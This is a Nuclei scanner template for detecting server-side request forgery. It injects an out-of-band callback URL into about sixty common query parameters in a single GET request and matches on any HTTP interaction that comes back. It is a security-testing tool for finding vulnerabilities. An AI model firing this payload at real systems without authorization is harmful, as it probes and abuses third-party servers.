SSRF check
Template for SSRF, based on params in gf (tomnomnom), added a bunch of extra params
id: generic-ssrf
info:
name: Parameter Based Generic SSRF
author: Redflare Cyber
severity: high
description: Generic template checks for SSRF vulns in params, based of gf
tags: oast,ssrf,generic
metadata:
parameters: access,adm,admin,alter,callback,cfg,clone,continue,create,data,dbg,debug,delete,dest,dir,disable,doc,document,domain,edit,enable,exec,execute,feed,file,filename,folder,grant,host,html,img,load,make,modify,navigation,next,open,out,page,path,pg,php_path,port,redirect,reference,rename,reset,return,root,shell,show,site,style,test,to,toggle,uri,url,val,validate,view,window
requests:
- method: GET
path:
- "{{BaseURL}}?access=http://{{interactsh-url}}/&adm=http://{{interactsh-url}}/&admin=http://{{interactsh-url}}/&alter=http://{{interactsh-url}}/&callback=http://{{interactsh-url}}/&cfg=http://{{interactsh-url}}/&clone=http://{{interactsh-url}}/&continue=http://{{interactsh-url}}/&create=http://{{interactsh-url}}/&data=http://{{interactsh-url}}/&dbg=http://{{interactsh-url}}/&debug=http://{{interactsh-url}}/&delete=http://{{interactsh-url}}/&dest=http://{{interactsh-url}}/&dir=http://{{interactsh-url}}/&disable=http://{{interactsh-url}}/&doc=http://{{interactsh-url}}/&document=http://{{interactsh-url}}/&domain=http://{{interactsh-url}}/&edit=http://{{interactsh-url}}/&enable=http://{{interactsh-url}}/&exec=http://{{interactsh-url}}/&execute=http://{{interactsh-url}}/&feed=http://{{interactsh-url}}/&file=http://{{interactsh-url}}/&filename=http://{{interactsh-url}}/&folder=http://{{interactsh-url}}/&grant=http://{{interactsh-url}}/&host=http://{{interactsh-url}}/&html=http://{{interactsh-url}}/&img=http://{{interactsh-url}}/&load=http://{{interactsh-url}}/&make=http://{{interactsh-url}}/&modify=http://{{interactsh-url}}/&navigation=http://{{interactsh-url}}/&next=http://{{interactsh-url}}/&open=http://{{interactsh-url}}/&out=http://{{interactsh-url}}/&page=http://{{interactsh-url}}/&path=http://{{interactsh-url}}/&pg=http://{{interactsh-url}}/&php_path=http://{{interactsh-url}}/&port=http://{{interactsh-url}}/&redirect=http://{{interactsh-url}}/&reference=http://{{interactsh-url}}/&rename=http://{{interactsh-url}}/&reset=http://{{interactsh-url}}/&return=http://{{interactsh-url}}/&root=http://{{interactsh-url}}/&shell=http://{{interactsh-url}}/&show=http://{{interactsh-url}}/&site=http://{{interactsh-url}}/&style=http://{{interactsh-url}}/&test=http://{{interactsh-url}}/&to=http://{{interactsh-url}}/&toggle=http://{{interactsh-url}}/&uri=http://{{interactsh-url}}/&url=http://{{interactsh-url}}/&val=http://{{interactsh-url}}/&validate=http://{{interactsh-url}}/&view=http://{{interactsh-url}}/&window=http://{{interactsh-url}}/"
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
Last updated